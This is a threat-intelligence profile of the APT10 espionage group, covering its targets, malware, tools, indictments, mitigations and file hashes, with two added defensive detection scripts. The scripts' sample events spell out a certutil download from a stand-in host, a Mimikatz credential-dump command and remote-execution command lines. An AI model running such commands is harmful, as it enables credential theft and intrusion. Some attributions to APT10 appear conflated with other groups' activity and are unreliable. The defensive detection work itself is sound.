Threat Actor Profile
Origin: China, 2009
Aliases: Cloud Hopper (name of the MSP intrusion campaign), Red Apollo, CVNX, Stone Panda, menuPass / MenuPass Group, POTASSIUM, APT 10
Key Target Sectors: Construction and Engineering, Aerospace, and Telecom firms, and Governments
Attack Vectors: Spear phishing, Spam Email, Data-theft, Typosquatting, Unauthorized Access, Phishing, Backdoor
Target Region: North America, South-East Asia, Eastern Asia, Western Europe
Malware Used: Haymaker, Bugjuice, Snugride, QuasarRAT, RedLeaves, PlugX, PoisonIvy and ChChes
Tools Used: Certutil, Cmd, Impacket, Mimikatz, Net, Ping and PsExec
Vulnerabilities Exploited: EternalRomance SMBv1 exploit (CVE-2017-0143, one of the MS17-010 vulnerabilities)
APT10 is a Chinese cyber espionage group that has been active since at least 2009. It has taken an interest in a range of sectors, including defense, healthcare, government, and aerospace. Between 2016 and 2017 the group was observed targeting managed IT service providers, manufacturing and mining companies, and a university. Most recently, in April 2019, its activity was seen again in Southeast Asia, a region where this group frequently operates.
Which organizations have they targeted?
APT10 is primarily known for targeting US government and defense industrial base organizations, with the earliest known activity traced back to December 2009. It has also been observed targeting organizations in Japan, the United Kingdom, India, Canada, Brazil, South Africa, Australia, Thailand, South Korea, France, Switzerland, Sweden, Finland, and Norway. Between 2016 and 2017 the group targeted manufacturing organizations in India, Japan and Northern Europe, a mining organization in South America, and IT service providers worldwide. The group was probably also involved in the 2016 data leaks at Keidanren, Japan's major business lobby. In early 2018, APT10 was reported to have attacked systems used for the 2018 Winter Olympics in Pyeongchang, South Korea, using the EternalRomance SMB exploit. Numerous small code fragments scattered through different malware samples from these attacks were linked to APT3, APT10, and APT12; attribution of the Olympic attacks remains contested, since the same samples also carried traces pointing at other groups. In April, APT10 was found stealing financial information from US firms, seeking to give domestic Chinese enterprises an edge in international deals, and collecting information from Japanese defense firms on Tokyo's policy toward the North Korean nuclear situation. In late 2018 it was revealed that around nine global Managed Service Providers (MSPs), including Hewlett Packard Enterprise and IBM, had been compromised by APT10. Most recently, in April 2019, new activity was detected in Southeast Asia, where new malware variants linked to APT10 were discovered.
What is their motivation behind the attacks?
APT10 focuses on strategic intelligence targets related to trade negotiations, research and development in competition with Chinese commercial entities, and high-value counterintelligence targets overseas. This targeting supports Chinese national security goals: obtaining valuable intelligence and military information, and stealing confidential business data to benefit Chinese corporations. The group has traditionally attacked commercial enterprises at scale. At the beginning of 2018, however, it began devoting a portion of its operations to Managed Service Providers (MSPs), most likely in order to exfiltrate sensitive client data through the providers' access.
APT10's attack methods include both traditional spear phishing campaigns and backdoors to penetrate the targeted network. Its spear phishing attacks have been relatively unsophisticated, leveraging .lnk files inside archives, files with double extensions (e.g. [Redacted]_Group_Meeting_Document_20170222_doc_.exe), and in some cases an identically named decoy document and malicious launcher within the same archive. In addition to spear phishing, APT10 has been observed reaching victims through global third-party service providers.
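The three lure patterns above (.lnk inside an archive, a document-looking double extension, and a decoy document paired with a same-named launcher) are easy to check mechanically before an attachment reaches a user. The following is an added example, not code from the original profile or from any vendor report: it scores an archive's member list against those patterns. The archive listing is constructed for illustration and is not a real sample; the extension sets are this example's assumptions.

```python
"""Added example, not code from the original page: flag archive member names
that fit the APT10 lure patterns described above (.lnk files inside archives,
document-looking double extensions such as '..._doc_.exe', and a decoy
document paired with a same-named launcher). The listing below is constructed
for illustration and does not come from a real sample."""
import re
from typing import Dict, List, Tuple

# Extension sets are assumptions of this example, not taken from the report.
LAUNCHER_EXTS = {".exe", ".scr", ".com", ".pif", ".lnk", ".js", ".vbs", ".hta", ".bat", ".cmd"}
DOCUMENT_EXTS = {".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".pdf", ".rtf", ".txt"}

# A document extension token (with or without its dot, e.g. "_doc_" or ".pdf")
# sitting right before the real launcher extension at the end of the name.
DOUBLE_EXT_RE = re.compile(
    r"[._ -](doc|docx|xls|xlsx|ppt|pptx|pdf|rtf|txt)[._ -]*"
    r"\.(exe|scr|com|pif|js|vbs|hta|bat|cmd|lnk)$",
    re.IGNORECASE,
)


def _basename(member: str) -> str:
    return member.replace("\\", "/").rsplit("/", 1)[-1]


def _stem_ext(member: str) -> Tuple[str, str]:
    """Split an archive member path into (lowercase stem, lowercase extension)."""
    name = _basename(member)
    dot = name.rfind(".")
    if dot <= 0:
        return name.lower().strip(), ""
    return name[:dot].lower().strip(), name[dot:].lower()


def analyze_archive_listing(members: List[str]) -> Dict[str, list]:
    """Return every lure pattern found in the member names, grouped by pattern."""
    findings: Dict[str, list] = {
        "lnk_in_archive": [],
        "double_extension": [],
        "decoy_launcher_pair": [],
    }
    docs: Dict[str, str] = {}
    launchers: Dict[str, str] = {}
    for m in members:
        stem, ext = _stem_ext(m)
        if ext == ".lnk":
            findings["lnk_in_archive"].append(m)
        if DOUBLE_EXT_RE.search(_basename(m)):
            findings["double_extension"].append(m)
        if ext in DOCUMENT_EXTS:
            docs.setdefault(stem, m)
        elif ext in LAUNCHER_EXTS:
            launchers.setdefault(stem, m)
    # Same stem, one document and one launcher: the "decoy plus launcher" trick.
    for stem in sorted(docs.keys() & launchers.keys()):
        findings["decoy_launcher_pair"].append((docs[stem], launchers[stem]))
    return findings


def is_suspicious(members: List[str]) -> bool:
    """True if any lure pattern is present in the listing."""
    return any(analyze_archive_listing(members).values())


# Constructed listing: mirrors the naming tricks the profile describes.
SAMPLE_LISTING = [
    "Group_Meeting_Document_20170222_doc_.exe",  # double extension
    "Agenda.docx",                               # decoy document
    "Agenda.lnk",                                # same-named launcher
    "readme.txt",
    "photos/trip.jpg",
]

if __name__ == "__main__":
    for pattern, hits in analyze_archive_listing(SAMPLE_LISTING).items():
        print(f"{pattern}: {hits}")
    print("suspicious:", is_suspicious(SAMPLE_LISTING))
```

On a real mail gateway the member list would come from `zipfile.ZipFile(path).namelist()` (or the equivalent for RAR/7z), and a listing with any finding would be quarantined for analyst review rather than blocked outright, since legitimate archives occasionally contain shortcuts.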
APT10 used PlugX from 2014 to 2016, progressively improving and deploying newer versions while standardizing its command and control (C2) functionality. The 2016 intrusion at TeamViewer, in which the attackers breached the network using the Winnti backdoor, was also believed to be linked to this group. APT10 stopped using the Poison Ivy malware family after a security firm comprehensively documented its functionality and features. In late 2018 the group updated its techniques: spear phishing emails now carried password-protected Word documents containing a malicious VBA macro that attempted to deliver the UPPERCUT backdoor, with Japanese titles related to maritime, diplomatic, and North Korean issues. In April 2019 the group was seen using fake or misspelled domain names resembling those of legitimate technology companies (typosquatting) together with C2 servers located in South Korea. In May 2019, a Linux version of the Winnti malware was identified in a cyberattack against Bayer. It consisted of two files: libxselinux (the main backdoor) and libxselinux.so (a library used to obfuscate its activity).
Known tools and malware
The group has devoted resources to improving its malware known as Haymaker, Bugjuice, Snugride and QuasarRAT. APT10's malware can be divided into two categories: sustained and tactical. The tactical malware, EvilGrab and now ChChes (and likely RedLeaves), is designed to be lightweight and disposable, while the sustained malware, Poison Ivy, PlugX and now Quasar, provides a more comprehensive feature set.
Malicious programs used by APT10
- Haymaker - A backdoor that can execute and download other payloads in the form of modules.
- Bugjuice - A backdoor that is executed by launching a benign file to hijack the search order for loading a malicious DLL into it.
- Snugride - A backdoor that communicates with its C2 server via HTTP requests.
- QuasarRAT - A fully functional .NET backdoor, which has been used by multiple cyber espionage groups in the past.
- RedLeaves - A malware family whose code overlaps with PlugX and is possibly based on the open-source tool Trochilus.
- PlugX - A remote access tool (RAT) that uses modular plugins.
- PoisonIvy - A popular remote access tool (RAT) that has been used by many cyber espionage groups.
- ChChes - Trojan that is believed to be used exclusively by APT10.
- EvilGrab - A malware family with common reconnaissance capabilities.
- PowerSploit - An open-source offensive security framework consisting of PowerShell modules and scripts.
Known Commercial/Open Source Tools used by APT10
- Certutil - A Windows command-line utility for obtaining certificate authority information and configuring Certificate Services; its -urlcache and -decode options are widely abused to download and Base64-decode payloads without dropping a dedicated downloader.
- Cmd - Windows command-line interpreter that can be used to interact with systems and execute other processes and utilities
- Impacket - An open source collection of modules written in Python for programmatically constructing and manipulating network protocols.
- Mimikatz - A credential dumper capable of obtaining plaintext Windows account logins and passwords from LSASS memory.
- Net - A utility component of the Windows operating system.
- Ping - An operating system utility commonly used to troubleshoot and verify network connections.
- PsExec - A Microsoft Sysinternals tool that executes a program on another computer over SMB by installing a temporary service (PSEXESVC) on the target.
- Pwdump - A credential dumper used to dump passwords.
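None of the tools above is malicious by itself, so detection has to rest on how they are invoked and on several of them appearing together on one host. The following is an added example, not code from the original profile: it runs a small weighted rule set over constructed process-creation events for certutil, net, PsExec, Mimikatz-style module syntax and the Impacket loopback-share footprint, and aggregates the hits per host. The event dictionary layout, the rule weights and the host names are this example's assumptions; on real telemetry the same keys would be filled from Sysmon Event ID 1 or Windows Security event 4688.

```python
"""Added example, not code from the original page: score constructed
process-creation events for the living-off-the-land tooling listed above
(certutil, net, PsExec, Mimikatz, Impacket). The event layout, rule weights
and host names are this example's assumptions; map Sysmon Event ID 1 or
Windows Security 4688 fields onto the same keys to run it on real telemetry."""
import re
from typing import Dict, List

# (rule name, regex on the image basename, regex on the command line, weight)
RULES = [
    ("certutil_fetch_or_decode", r"certutil(\.exe)?", r"-(urlcache|decode|encode)\b", 3),
    # Mimikatz is usually renamed, so match its module syntax rather than the image.
    ("mimikatz_module_syntax", r".*", r"(sekurlsa|lsadump|kerberos)::|privilege::debug", 5),
    ("psexec_client_or_service", r"(psexec(64)?|psexesvc)(\.exe)?", r".*", 3),
    ("net_admin_group_recon", r"net1?(\.exe)?", r"\b(group|localgroup)\b.*admins", 2),
    ("net_admin_share_mapping", r"net1?(\.exe)?", r"\buse\b.*\\\\[^\\]+\\(admin|c)\$", 2),
    # Redirecting output through a loopback admin share is the well-known
    # footprint of Impacket's smbexec/wmiexec style of remote execution.
    ("impacket_loopback_share_output", r"cmd(\.exe)?", r"\\\\127\.0\.0\.1\\(admin|c)\$\\__", 4),
]
COMPILED = [(n, re.compile(i, re.I), re.compile(c, re.I), w) for n, i, c, w in RULES]
WEIGHTS = {n: w for n, _, _, w in RULES}


def _basename(image: str) -> str:
    return image.replace("/", "\\").rsplit("\\", 1)[-1]


def match_rules(event: Dict[str, str]) -> List[str]:
    """Return the names of every rule a single event trips."""
    base = _basename(event.get("image", ""))
    cmd = event.get("cmdline", "")
    return [n for n, img_re, cmd_re, _ in COMPILED
            if img_re.fullmatch(base) and cmd_re.search(cmd)]


def score_hosts(events: List[Dict[str, str]]) -> Dict[str, dict]:
    """Aggregate per host so chained LOLBin use on one box outweighs a lone hit."""
    out: Dict[str, dict] = {}
    for ev in events:
        hits = match_rules(ev)
        if not hits:
            continue
        rec = out.setdefault(ev["host"], {"score": 0, "rules": []})
        rec["score"] += sum(WEIGHTS[n] for n in hits)
        for n in hits:
            if n not in rec["rules"]:
                rec["rules"].append(n)
    return out


def alert_hosts(events: List[Dict[str, str]], threshold: int = 5) -> List[str]:
    """Hosts whose aggregated score reaches the threshold, sorted by name."""
    return sorted(h for h, rec in score_hosts(events).items() if rec["score"] >= threshold)


# Constructed events (hosts, users and the example.test domain are made up).
SAMPLE_EVENTS = [
    {"host": "WS01", "user": r"CORP\jdoe", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil -urlcache -split -f http://update.example.test/x.txt C:\Users\Public\x.txt"},
    {"host": "WS01", "user": r"CORP\jdoe", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil -decode C:\Users\Public\x.txt C:\Users\Public\svc.exe"},
    {"host": "WS01", "user": r"CORP\jdoe", "image": r"C:\Users\Public\m.exe",
     "cmdline": r'm.exe "privilege::debug" "sekurlsa::logonpasswords" exit'},
    {"host": "WS01", "user": r"CORP\jdoe", "image": r"C:\Windows\System32\net.exe",
     "cmdline": r'net group "Domain Admins" /domain'},
    {"host": "SRV02", "user": r"CORP\svc_backup", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /Q /c whoami 1> \\127.0.0.1\ADMIN$\__1612345678.12 2>&1"},
    {"host": "SRV02", "user": r"CORP\svc_backup", "image": r"C:\Windows\System32\net.exe",
     "cmdline": r"net use \\FS01\C$ /user:CORP\svc_backup Winter2018!"},
    {"host": "SRV02", "user": "NT AUTHORITY\\SYSTEM", "image": r"C:\Windows\PSEXESVC.exe",
     "cmdline": "PSEXESVC.exe"},
    # Benign administration on WS07: certutil without download/decode, a single ping.
    {"host": "WS07", "user": r"CORP\admin", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil -verify C:\certs\corp.cer"},
    {"host": "WS07", "user": r"CORP\admin", "image": r"C:\Windows\System32\PING.EXE",
     "cmdline": "ping -n 1 fileserver01"},
]

if __name__ == "__main__":
    for host, rec in score_hosts(SAMPLE_EVENTS).items():
        print(f"{host}: score={rec['score']} rules={rec['rules']}")
    print("alert:", alert_hosts(SAMPLE_EVENTS))
```

The weights are deliberately low for the individual utilities and high for credential-dumping syntax, so a lone `net use` by a backup account never pages anyone, while certutil download, decode and a credential dump on the same workstation do. In production the aggregation window would be bounded in time (for example, per host per hour) rather than over the whole event list.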
In December 2018, two individuals, Zhu Hua and Zhang Shilong, were charged with hacking more than 45 technology companies and government departments in the USA. The pair, believed to be associated with APT10, worked for the Chinese company "Huaying Haitai" and acted in association with the Chinese Ministry of State Security's (MSS) Tianjin State Security Bureau (TSSB); their main task was stealing data from targeted organizations. They were also accused of compromising, from 2014 onwards, a large number of managed service providers that remotely provided IT services to prominent customers. The data they pursued spanned many sectors, including satellite technology, aviation, pharmaceuticals, mining, manufacturing, production and oil and gas exploration, and they ultimately stole hundreds of gigabytes of sensitive data.
Organizations should deploy reliable antivirus solutions to guard against the known malware families APT10 commonly uses to gain a foothold in a network. Application control or application whitelisting can prevent unauthorized executables, which mostly arrive via spear phishing emails, from running at all. Usage monitoring tools with orchestration support let IT teams detect unusual behavior, block it, and contain it before it reaches critical systems. Sharing strategic and tactical threat intelligence with trusted partners, ISACs and regulatory bodies helps organizations develop and practice shared strategies for combating such threats. Finally, automated maintenance using reboot-to-restore software helps ensure clean configurations and prevents dormant threats from remaining hidden or propagating inside a network for long.
Indicators of Compromise
File hashes (SHA256)
0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded
96649c5428c874f2228c77c96526ff3f472bc2425476ad1d882a8b55faa40bf5
c8d86e9f486d23285b744279812ef9047a0908e39656c2ea4cdf3e182f80e11d
f13536685206a94a8d3938266f100bb2dffa740a202283c7ea35c58e6dbbb839
e0f91da52fdc61757f6a3f276ae77b01d2d1cc4b3743629c5acbd0341e5de80e
02b95ef7a33a87cc2b3b6fd47db03e711045974e1ecf631d3ba9e076e1e374e9
29b0454db88b634656a3fc7c36f318b126a83ae8fb7f73fe9ff349a8f8536c7b
41542d11abf5bf4a18332e9c4f2c8d1eb5c7e5d4298749b610d86caaa1acb62c
Winnti Command and Control Servers